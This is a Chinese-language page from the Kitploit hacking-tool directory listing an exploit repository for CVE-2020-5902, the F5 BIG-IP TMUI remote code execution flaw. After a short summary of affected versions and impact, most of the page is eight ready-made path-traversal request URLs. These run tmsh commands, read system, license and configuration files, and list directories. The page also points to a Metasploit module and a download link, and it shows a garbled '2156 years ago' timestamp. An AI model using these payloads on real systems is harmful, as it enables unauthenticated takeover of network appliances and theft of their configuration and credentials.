Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-5902 — [CVE-2020-5902] F5 BIG-IP 远程代码执行(RCE) | Kitploit
工具/GitHubGitHub/murataydemir/cve-2020-5902
漏洞利用框架漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubmurataydemir/cve-2020-5902

CVE-2020-5902

[CVE-2020-5902] F5 BIG-IP 远程代码执行(RCE)

查看仓库
2156年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

[CVE-2020-5902] F5 BIG-IP 流量管理用户界面(TMUI)远程代码执行


在 BIG-IP 版本 15.0.0-15.1.0.3、14.1.0-14.1.2.5、13.1.0-13.1.3.3、12.1.0-12.1.5.1 和 11.6.1-11.6.5.1 中,流量管理用户界面(TMUI,也称为配置工具)在未公开页面中存在远程代码执行(RCE)漏洞。

此漏洞允许未经身份验证的攻击者或经过身份验证的用户,通过 BIG-IP 管理端口和/或自 IP 对配置工具进行网络访问,从而执行任意系统命令、创建或删除文件、禁用服务以及/或执行任意 Java 代码。该漏洞可能导致系统完全受损。处于设备模式的 BIG-IP 系统同样存在此漏洞。此问题不会暴露在数据平面;仅控制平面受影响。

root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

原始安全公告由 F5 发布,您可以点击此处查阅。
此外,CVE-2020-5902 存在一个评级为 Excellent 的 Metasploit 模块。您可以在以下位置找到该 Metasploit 模块的 Ruby 代码: exploits/linux/http/f5_bigip_tmui_rce.rb

下载工具